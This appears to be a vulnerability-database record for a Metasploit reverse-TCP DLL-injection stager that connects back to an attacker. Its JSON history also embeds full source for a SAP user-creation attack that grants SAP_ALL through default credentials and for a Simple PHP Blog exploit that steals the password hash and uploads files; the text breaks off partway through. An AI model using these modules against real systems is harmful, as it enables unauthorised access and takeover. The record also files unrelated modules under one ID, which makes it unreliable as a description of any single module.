ID MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
Inject a custom DLL into the exploited process. Connect back to the attacker.
# -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/reverse_tcp_rc4_dns'
module MetasploitModule
  # Length in bytes of the generated stager as recorded by the framework's
  # tooling; kept here so the size can be reported without assembling the
  # stager (must be regenerated whenever the stager body changes).
  CachedSize = 425

  include Msf::Payload::Stager
  # Per its name, this mixin supplies the RC4-encrypted reverse-TCP stager
  # whose handler address is resolved via DNS; the assembly itself lives in
  # the framework and is not visible in this file.
  include Msf::Payload::Windows::ReverseTcpRc4Dns

  class << self
    # Short name under which this stager's handler is selected.
    #
    # @return [String]
    def handler_type_alias
      'reverse_tcp_rc4_dns'
    end
  end

  # Builds this stager's metadata, merges it with any caller-supplied info
  # and hands the result to the framework's initializer.
  #
  # @param info [Hash] metadata supplied by the caller (e.g. from a stage
  #   combining with this stager); the entries below are merged into it
  def initialize(info = {})
    metadata = {
      'Name'        => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',
      'Description' => 'Connect back to the attacker',
      'Author'      => %w[hdm skape sf mihi RageLtMan],
      'License'     => MSF_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X86,
      'Handler'     => Msf::Handler::ReverseTcp,
      # Calling convention the stage expects: the connected socket is
      # handed over in EDI ('sockedi').
      'Convention'  => 'sockedi',
      # The stage is loaded directly by this stager; no intermediate
      # (mid) stager is required.
      'Stager'      => { 'RequiresMidstager' => false }
    }
    super(merge_info(info, metadata))
  end
end
{"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-22T07:32:45", "history": [{"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/reverse_tcp_rc4_dns", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:50:14", "history": [], "viewCount": 8, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-07-02T23:50:14", "differentElements": ["href"], "edition": 1}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "591b03e69bf49b22b606bff855740cb7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6FA476CE00BC8482F43AF2BD9937FB32"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:88D0E22AEC73763DA2CFC04B17A18815", "CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "kitploit", "idList": ["KITPLOIT:4252843133018759751", "KITPLOIT:9165290622393060450", "KITPLOIT:5834604300745056017", "KITPLOIT:7455761002232864942"]}, {"type": "exploitdb", "idList": ["EDB-ID:46335", "EDB-ID:46334", "EDB-ID:46345", "EDB-ID:46342", "EDB-ID:46343", "EDB-ID:46338", "EDB-ID:46346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107544", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1666-1:43CD3"]}], "modified": "2017-08-21T15:32:28"}}, "objectVersion": "1.4", "sourceHref": "", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": ""}, "lastseen": "2017-08-21T15:32:28", "differentElements": ["description", "metasploitReliability", "modified", "published", "sourceData", "sourceHref"], "edition": 2}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:14:38", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect 
back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:14:38", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 3}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "d6763ca1c5b1001f04abb43ab7497ec3", "type": "metasploit", "bulletinFamily": "exploit", "title": "SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation", "description": "This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP.\n", "published": "2012-11-07T16:04:07", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"], "cvelist": [], "lastseen": "2019-06-07T18:44:20", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", 
"KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. 
Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation',\n 'Description' => %q{\n This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP\n /sap/bc/soap/rfc service, for creating/modifying users on a SAP.\n },\n 'References' =>\n [\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'Author' =>\n [\n 'Agnivesh Sathasivam',\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992']),\n OptString.new('ABAP_PASSWORD',[false,'Password for the account (Default is msf1234)','msf1234']),\n OptString.new('ABAP_USER',[false,'Username for the account (Username in upper case only. 
Default is MSF)', 'MSF'])\n ])\n end\n\n def run_host(ip)\n data = '<?xml version=\"1.0\" encoding=\"utf-8\" ?>'\n data << '<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n data << '<env:Body>'\n data << '<n1:SUSR_RFC_USER_INTERFACE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">'\n data << '<ACTIVITY>01</ACTIVITY>'\n data << '<PASSWORD>' + datastore['ABAP_PASSWORD'] + '</PASSWORD>'\n data << '<USER>' + datastore['ABAP_USER'] + '</USER>'\n data << '<USER_PROFILES>'\n data << '<item>'\n data << '<PROFN>SAP_ALL</PROFN>'\n data << '</item>'\n data << '</USER_PROFILES>'\n data << '</n1:SUSR_RFC_USER_INTERFACE>'\n data << '</env:Body>'\n data << '</env:Envelope>'\n\n begin\n vprint_status(\"[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'\")\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'cookie' => \"sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}\",\n 'ctype' => 'text/xml; charset=UTF-8',\n 'encode_params' => false,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n if res and res.code == 200\n if res.body =~ /<h1>Logon failed<\\/h1>/\n vprint_error(\"[SAP] #{ip}:#{rport} - Logon failed\")\n return\n elsif res.body =~ /faultstring/\n error = []\n error = [ res.body.scan(%r{(.*?)}) ]\n vprint_error(\"[SAP] #{ip}:#{rport} - #{error.join.chomp}\")\n return\n else\n print_good(\"[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created\")\n return\n end\n elsif res and res.code 
== 500 and res.body =~ /USER_ALLREADY_EXISTS/\n vprint_error(\"[SAP] #{ip}:#{rport} - user already exists\")\n return\n else\n vprint_error(\"[SAP] #{ip}:#{rport} - Unknown error\")\n vprint_error(\"[SAP] #{ip}:#{rport} - Error code: \" + res.code) if res\n vprint_error(\"[SAP] #{ip}:#{rport} - Error message: \" + res.message) if res\n return\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"[SAP] #{rhost}:#{rport} - Unable to connect\")\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-07T18:44:20", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 4}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-07T20:45:51", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect 
back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-07T20:45:51", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "78caf39dddc658ef63d26b455b63b5b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-09T17:03:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32807", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293", "MYHACK58:62201994275", "MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:770767703878928446", "KITPLOIT:4058383618754638390"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}], "modified": "2019-05-28T21:14:38"}}, "objectVersion": "1.4", 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T17:03:03", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-09T21:00:25", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-06-09T21:00:25"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108631", "SMNTC-108577", "SMNTC-108646", "SMNTC-108603", "SMNTC-108584", "SMNTC-108641", "SMNTC-108654"]}], "modified": "2019-06-09T21:00:25"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T21:00:25", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 7}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "0a885c9ebfc50d8b9903879e1b8b987a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Simple PHP Blog Remote Command Execution", "description": "This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. 
The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted.\n", "published": "2008-10-19T21:03:39", "modified": "2017-11-08T16:00:24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2733"], "cvelist": ["CVE-2005-2733"], "lastseen": "2019-06-27T10:42:29", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-06-09T21:00:25"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108631", "SMNTC-108577", "SMNTC-108646", "SMNTC-108603", "SMNTC-108584", "SMNTC-108641", "SMNTC-108654"]}], "modified": "2019-06-09T21:00:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sphpblog_file_upload.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n 
super(update_info(info,\n 'Name' => 'Simple PHP Blog Remote Command Execution',\n 'Description' => %q{\n This module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n application to upload arbitrary data and thus execute a shell. The first\n vulnerability exposes the hash file (password.txt) to unauthenticated users.\n The second vulnerability lies within the image upload system provided to\n logged-in users; there is no image validation function in the blogger to\n prevent an authenticated user from uploading any file type. The third\n vulnerability occurs within the blog comment functionality, allowing\n arbitrary files to be deleted.\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-2733'],\n ['OSVDB', '19012'],\n ['BID', '14667'],\n ['EDB', '1191'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n },\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 25 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"Sphpblog directory path\", \"/sphpblog\"]),\n ])\n end\n\n def check\n res = send_request_raw({\n 'uri' => normalize_uri(datastore['URI'], '/index.php')\n }, 25)\n\n if (res and res.body =~ /Simple PHP Blog (\\d)\\.(\\d)\\.(\\d)/)\n\n ver = [ $1.to_i, $2.to_i, $3.to_i ]\n vprint_status(\"Simple PHP Blog #{ver.join('.')}\")\n\n if (ver[0] == 0 and ver[1] < 5)\n if (ver[1] == 4 and ver[2] > 0)\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def retrieve_password_hash(file)\n\n res = send_request_raw({\n 'uri' => normalize_uri(datastore['URI'], file)\n }, 25)\n\n if (res and res.message == \"OK\" and res.body)\n print_good(\"Successfully retrieved hash: #{res.body}\")\n return res.body\n else\n 
fail_with(Failure::NotVulnerable, \"Failed to retrieve hash, server may not be vulnerable.\")\n return false\n end\n end\n\n def create_new_password(user, pass)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'),\n 'method' => 'POST',\n 'data' => \"user=#{user}&pass=#{pass}\",\n }, 25)\n\n if (res)\n print_good(\"Successfully created temporary account.\")\n else\n print_error(\"Unable to create a temporary account!\")\n end\n end\n\n def retrieve_session(user, pass)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI'], \"/login_cgi.php\"),\n 'method' => 'POST',\n 'data' => \"user=#{user}&pass=#{pass}\",\n }, 25)\n\n if res\n print_good(\"Successfully logged in as #{user}:#{pass}\")\n\n if res.get_cookies =~ /my_id=(.*)/\n session = $1\n print_good(\"Successfully retrieved cookie: #{session}\")\n return session\n else\n print_error(\"Error retrieving cookie!\")\n end\n else\n print_error(\"No response received while logging in.\")\n end\n end\n\n def upload_page(session, dir, newpage, contents)\n\n boundary = rand_text_alphanumeric(6)\n\n data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"userfile\\\"; \"\n data << \"filename=\\\"#{newpage}\\\"\\r\\nContent-Type: text/plain\\r\\n\\r\\n\"\n data << contents\n data << \"\\r\\n--#{boundary}--\"\n\n res = send_request_raw({\n 'uri'\t => normalize_uri(datastore['URI'], \"/upload_img_cgi.php\"),\n 'method' => 'POST',\n 'data' => data,\n 'headers' =>\n {\n 'Content-Type'\t => 'multipart/form-data; boundary=' + boundary,\n 'Content-Length' => data.length,\n 'Cookie'\t => \"my_id=#{session}; PHPSESSID=#{session}\",\n }\n }, 25)\n\n if (res)\n print_good(\"Successfully Uploaded #{newpage}\")\n else\n print_error(\"Error uploading #{newpage}\")\n end\n end\n\n def reset_original_password(hash, scriptlocation)\n\n res = send_request_cgi({\n 'uri'\t => normalize_uri(datastore['URI'], scriptlocation),\n 'method' => 'POST',\n 'data'\t => \"hash=\" + 
